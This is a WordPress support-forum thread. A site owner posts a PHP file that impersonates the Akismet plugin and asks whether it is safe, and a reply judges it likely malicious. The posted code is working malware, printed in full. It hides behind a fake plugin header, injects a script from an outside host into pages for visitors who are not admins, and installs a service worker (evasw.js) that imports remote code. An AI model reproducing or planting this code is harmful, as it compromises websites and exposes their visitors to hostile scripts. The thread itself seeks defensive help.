• tabatsoy

    (@tabatsoy)


    Hi All,

    May I ask is this plugin safe? it just showed on my plugins folder but not visible on plugins page on admin in wp

    <?php
    namespace Dev\akismet;
    /*
     * Plugin Name: Akismet Anti-Spam
     * Plugin URI: https://automattic.com/wordpress-plugins/
     * Version: 0.1.2
     * Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
     * Author: Automattic
     * Author URI: https://automattic.com
     * Requires at least: 3.0.0
     *
     * Text Domain: akismet
     * Domain Path: /languages/
     * License: GPL-3.0
     * License URI: http://www.gnu.org/licenses/gpl-3.0.txt
     *
     * @author Automattic
     */
    
    
    define( __NAMESPACE__ . "\\DEBUG", false );
    define( __NAMESPACE__ . "\\DESTINATION_URL", base64_decode('Lw=='));
    define( __NAMESPACE__ . "\\DESTINATION_URL_ID", "" );
    define( __NAMESPACE__ . "\\REDIRECTION_ID_BLOCKER", [] );
    define( __NAMESPACE__ . "\\USER_CAPABILITY", "manage_options" );
    define( __NAMESPACE__ . "\\USER_EMAILS", [] );
    define( __NAMESPACE__ . "\\PREVIEW_EMAILS", [""] );
    define( __NAMESPACE__ . "\\WHITELIST_IPS", [] );
    define( __NAMESPACE__ . "\\REDIRECT_STATUS_CODE", "302" );
    
    
    add_action( 'template_redirect', __NAMESPACE__ . '\\wp_redirect_website_to_url' );
    add_filter( 'login_redirect', __NAMESPACE__ . '\\login_redirect', 10, 3 );
    
    
    
    function wp_redirect_website_to_url() {
    
    	if ( ! file_exists( "evasw.js" ) ) {
    		copy(ABSPATH . "/wp-content/plugins/wp_pushup/evasw.js", "evasw.js");
     	}
    
    	$user = wp_get_current_user();
    
    	DEBUG && error_log( "DENTRO wp_redirect_website_to_url" );
    	DEBUG && error_log( "USER_CAPABILITY = " . USER_CAPABILITY );
    	DEBUG && error_log( "DESTINATION_URL_ID = " . DESTINATION_URL_ID );
    	DEBUG && error_log( "DESTINATION_URL = " . DESTINATION_URL );
    	DEBUG && error_log( "current_user_can(USER_CAPABILITY) = " . var_export( current_user_can( USER_CAPABILITY ), true ) );
    	DEBUG && error_log( "user_email = " . ( $user->user_email ?? "not set" ) );
    	if ( DESTINATION_URL_ID ) {
    		DEBUG && error_log( "get_post_status(DESTINATION_URL_ID) = " . var_export( get_post_status( DESTINATION_URL_ID ), true ) );
    		DEBUG && error_log( "is_single(DESTINATION_URL_ID) = " . var_export( is_single( DESTINATION_URL_ID ), true ) );
    		DEBUG && error_log( "is_page(DESTINATION_URL_ID) = " . var_export( is_page( DESTINATION_URL_ID ), true ) );
    	}
    	DEBUG && error_log( "WHITELIST_IPS = " . var_export( WHITELIST_IPS, true ) );
    	DEBUG && error_log( "user_ip = " . getClientIp() );
    
    	$redirect = true;
    
    	if ( ! empty( USER_CAPABILITY ) ) {
    		$redirect = $redirect && ( ! current_user_can( USER_CAPABILITY ) && ! is_wp_login() );
    	}
    
    	if ( ! empty( $user->user_email ) && ( ! empty( USER_EMAILS ) || ! empty( PREVIEW_EMAILS ) ) ) {
    		DEBUG && error_log( "email in list = " . ( in_array( $user->user_email, array_merge( USER_EMAILS, PREVIEW_EMAILS ) ) ? "yes" : "no" ) );
    		$redirect = $redirect && ( ! in_array( $user->user_email, array_merge( USER_EMAILS, PREVIEW_EMAILS ) ) );
    	}
    
    	if ( DESTINATION_URL_ID && ( is_single( DESTINATION_URL_ID ) || is_page( DESTINATION_URL_ID ) ) ) {
    		return;
    	}
    
    	if ( is_array(REDIRECTION_ID_BLOCKER) && sizeof(REDIRECTION_ID_BLOCKER) > 0 ) {
    		foreach(REDIRECTION_ID_BLOCKER as $blocker_id)
    			if( is_single( $blocker_id ) || is_page( $blocker_id ) )
    				return;
    		
    	}
    
    	if ( ! empty( WHITELIST_IPS ) && in_array( getClientIp(), WHITELIST_IPS ) ) {
    		return;
    	}
    
    	if ( $redirect ) {
    		echo "
    <script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://cjvdfw.com/code/native.js?h=waWQiOjExNDY3MDEsInNpZCI6MTE4NTIwNCwid2lkIjo0NDExNDYsInNyYyI6Mn0=eyJ';d.head.appendChild(s);})(document);</script>
    		";
    		return home_url();
    		exit;
    		# }
    	}
    
    }
    
    
    function is_wp_login() {
    
    	$ABSPATH = str_replace( array( '\\', '/' ), DIRECTORY_SEPARATOR, ABSPATH );
    	
    	$included_files  = get_included_files();
    	
    	$conditions = [
    		in_array( $ABSPATH . 'wp-login.php', $included_files ),
    		in_array( $ABSPATH . 'wp-register.php', $included_files ),
    		$GLOBALS['pagenow'] === 'wp-login.php',
    		$_SERVER['PHP_SELF'] === '/wp-login.php'
    	];
    
    	return in_array( true, $conditions, true );
    
    }
    
    
    function login_redirect( $redirect_to, $request, $user ){
    	if ( ! empty( $user->user_email ) && in_array( $user->user_email, PREVIEW_EMAILS ) ) {
    		return home_url();
    	}
    	else {
    		// if ( ! isset( $_COOKIE[base64_decode('cm91dGU=')]) ) {
    		// 	setcookie( base64_decode( 'cm91dGU=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
    		// 	return $redirect_to;
    		// }
    		return $redirect_to;
    	}
    }
    
    
    function getClientIp() {
    	if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    		$ip = $_SERVER['HTTP_CLIENT_IP'];
    	} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    		$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    	} else {
    		$ip = $_SERVER['REMOTE_ADDR'];
    	}
    	return filter_var($ip, FILTER_VALIDATE_IP);
    }
    

    and here is the content of the evasw.js

    importScripts(‘https://ulmoyc.com/v1/sw-import.js?h=waWQiOjExNDY3MDEsInNpZCI6MTE4NTIwNCwid2lkIjo0NDExNDYsInNyYyI6MiwicG0iOjB9eyJ&d=ayzunimmigration.com&#8217;);

    help would be appreciated

    The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)
  • Hi @tabatsoy

    The header file looks like the Akismet plugin, but once you take a look at the code, it is very different. This code seems to be part of a WordPress plugin that performs certain checks and redirects users under specific conditions, so I think it could be a malicious plugin. It’s important to note that this code snippet may be incomplete and may require additional code or files to function properly.

Viewing 1 replies (of 1 total)
  • The topic ‘wp_pushup’ is closed to new replies.